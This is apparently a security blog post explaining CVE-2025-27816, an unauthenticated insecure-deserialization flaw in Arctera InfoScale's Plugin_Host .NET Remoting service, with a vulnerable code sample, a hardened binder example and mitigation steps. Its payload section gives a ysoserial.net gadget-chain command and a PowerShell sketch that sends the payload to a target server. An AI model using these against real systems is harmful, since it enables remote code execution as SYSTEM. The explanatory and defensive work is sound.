In early 2025, security researchers disclosed a serious vulnerability tracked as CVE-2025-27816 in Arctera InfoScale versions 7.0 through 8.0.2. The flaw is insecure deserialization in a .NET Remoting endpoint exposed by the Windows Plugin_Host service. Left unpatched, it lets a remote, unauthenticated attacker execute arbitrary code on affected servers.
This post will explain what’s going on, how exploitation works, and—most importantly—what you can do to keep your servers safe.
Plugin_Host.exe exposes a .NET Remoting endpoint over the network.
- Problem: the service deserializes whatever message bytes it receives without restricting which types the stream is allowed to create. That is the textbook *insecure deserialization* bug.
- Result: anyone who can reach the endpoint can send crafted data and make the service run code of their choosing with LocalSystem (SYSTEM) privileges, with no credentials required.
2. How Does Deserialization Work?
.NET apps often pass objects between processes (or over the network) by “serializing” them to bytes and “deserializing” them back into live objects. The catch is that formatters such as BinaryFormatter record type names in the stream and faithfully rebuild whatever types they find there. If the bytes come from an untrusted party, that party chooses which types get instantiated, and many framework types run code (constructors, callbacks, delegates) while they are being rebuilt.
The vulnerable code in InfoScale looks something like this (simplified):
using System.IO;
using System.Runtime.Serialization.Formatters.Binary;

// Example of insecure object deserialization
public object ReceiveMessage(Stream incoming)
{
    // No Binder, no type allow-list: the stream decides which types get created
    BinaryFormatter formatter = new BinaryFormatter();
    object message = formatter.Deserialize(incoming); // DANGER: input not trusted!
    return message;
}
If attackers control what's in incoming, and the server uses BinaryFormatter, they can send evil .NET objects that execute code during deserialization.
*See Microsoft docs: BinaryFormatter Security Guide*
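As an added example (this is not InfoScale's code; the PluginMessage type, the Receiver class and the fixture messages are assumptions for illustration), here is the receive-side pattern above next to the minimum hardening a reviewer would ask for on .NET Framework: a SerializationBinder that allow-lists the one message type the endpoint expects, so a stream naming any other type is refused before BinaryFormatter instantiates it.

```csharp
// Added example, not InfoScale code. Assumes a .NET Framework 4.x console app;
// PluginMessage, Receiver and the demo messages are invented for illustration.
using System;
using System.Collections;
using System.IO;
using System.Runtime.Serialization;
using System.Runtime.Serialization.Formatters.Binary;

// The only message type this endpoint legitimately expects (assumed).
[Serializable]
public sealed class PluginMessage
{
    public string Command;
    public int Sequence;
}

// BinaryFormatter consults the binder for every type name it finds in the
// stream before creating an instance, so a gadget chain such as
// TypeConfuseDelegate is refused at the first unexpected type name.
public sealed class AllowListBinder : SerializationBinder
{
    public override Type BindToType(string assemblyName, string typeName)
    {
        if (typeName == typeof(PluginMessage).FullName)
            return typeof(PluginMessage);

        // Throw rather than return null: on .NET Framework a null result makes
        // the formatter fall back to resolving the type itself.
        throw new SerializationException("Unexpected type in stream: " + typeName);
    }
}

public static class Receiver
{
    // Vulnerable form: whatever type the sender names in the stream gets built.
    public static object ReceiveMessageUnsafe(Stream incoming)
    {
        var formatter = new BinaryFormatter();
        return formatter.Deserialize(incoming);
    }

    // Hardened form: same call, but only PluginMessage can come out of it.
    public static PluginMessage ReceiveMessage(Stream incoming)
    {
        var formatter = new BinaryFormatter { Binder = new AllowListBinder() };
        return (PluginMessage)formatter.Deserialize(incoming);
    }
}

public static class Demo
{
    // Serializes any object to a fresh stream, standing in for the network.
    private static MemoryStream Wire(object o)
    {
        var ms = new MemoryStream();
        new BinaryFormatter().Serialize(ms, o);
        ms.Position = 0;
        return ms;
    }

    public static void Main()
    {
        // A legitimate message round-trips through the hardened receiver.
        var ok = Receiver.ReceiveMessage(Wire(new PluginMessage { Command = "status", Sequence = 1 }));
        Console.WriteLine("Accepted: " + ok.Command + " #" + ok.Sequence);

        // Any other type (a harmless Hashtable here stands in for a gadget
        // object) is rejected before its constructors or callbacks ever run.
        try
        {
            Receiver.ReceiveMessage(Wire(new Hashtable()));
        }
        catch (SerializationException e)
        {
            Console.WriteLine("Rejected: " + e.Message);
        }

        // The unsafe receiver happily builds the unexpected type.
        Console.WriteLine("Unsafe receiver built: " + Receiver.ReceiveMessageUnsafe(Wire(new Hashtable())).GetType().Name);
    }
}
```

The binder is a stopgap, not a fix. Microsoft's position is that BinaryFormatter cannot be made safe for untrusted input; it is disabled by default in .NET 8 and removed from the shared framework in .NET 9. The durable repair for an endpoint like this is to move it to a format that does not carry type names, such as JSON or protobuf DTOs, and to keep the listener off untrusted networks in the meantime.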
Building a Payload
Attackers don't need to write anything bespoke: an off-the-shelf tool such as ysoserial.net generates a serialized gadget chain that runs a command of the attacker's choice when deserialized, a calculator for a demo or, more realistically, a reverse shell or backdoor.
Command example:
ysoserial.exe -g TypeConfuseDelegate -f BinaryFormatter -o raw -c "calc.exe" > payload.bin
A simple exploit sketch in PowerShell might look like this (*don't run on production!*). Note that it writes the bare BinaryFormatter blob to the socket; a real .NET Remoting TCP channel wraps each message in its own transport headers, so in practice the payload is delivered by a Remoting-aware client such as ysoserial.net's ExploitRemotingService plugin.
# Connect to the Plugin_Host listener (host and port of the target)
$client = New-Object System.Net.Sockets.TcpClient("target-server", 909)
$stream = $client.GetStream()
# Raw gadget chain produced by ysoserial.net above
$payload = [System.IO.File]::ReadAllBytes("payload.bin")
# Write(buffer, offset, count): send the whole file starting at offset 0
$stream.Write($payload, 0, $payload.Length)
$stream.Close()
$client.Close()
If successful, this runs calc.exe on the victim server as SYSTEM.
- No authentication required: it works against any vulnerable DR (Disaster Recovery) endpoint reachable on your network.
- Affected versions: InfoScale 7.0 through 8.0.2, on every Windows server where Plugin_Host is running and DR is enabled.
Short Term
If you're not using DR, stop the service and prevent it from starting again (run from an elevated command prompt):
Command-line version:
sc stop Plugin_Host
sc config Plugin_Host start= disabled
References & Further Reading
- CVE-2025-27816 on NVD
- Arctera InfoScale Vendor Advisory
- Microsoft: Security risks of BinaryFormatter
- ysoserial.net: .NET Payload Generation
- OWASP: Deserialization of Untrusted Data
Final Words
CVE-2025-27816 is a serious reminder that exposing serialization endpoints to untrusted networks is always dangerous, especially in Windows services running as SYSTEM.
If you don’t need DR, turn off Plugin_Host.
If you do, patch as soon as possible and limit network exposure.
Stay safe! 🚨
> *If you have questions or more details on the vulnerability, leave a comment below or contact your InfoScale security support team!*
Timeline
Published on: 03/07/2025 08:15:44 UTC
Last modified on: 03/07/2025 20:15:38 UTC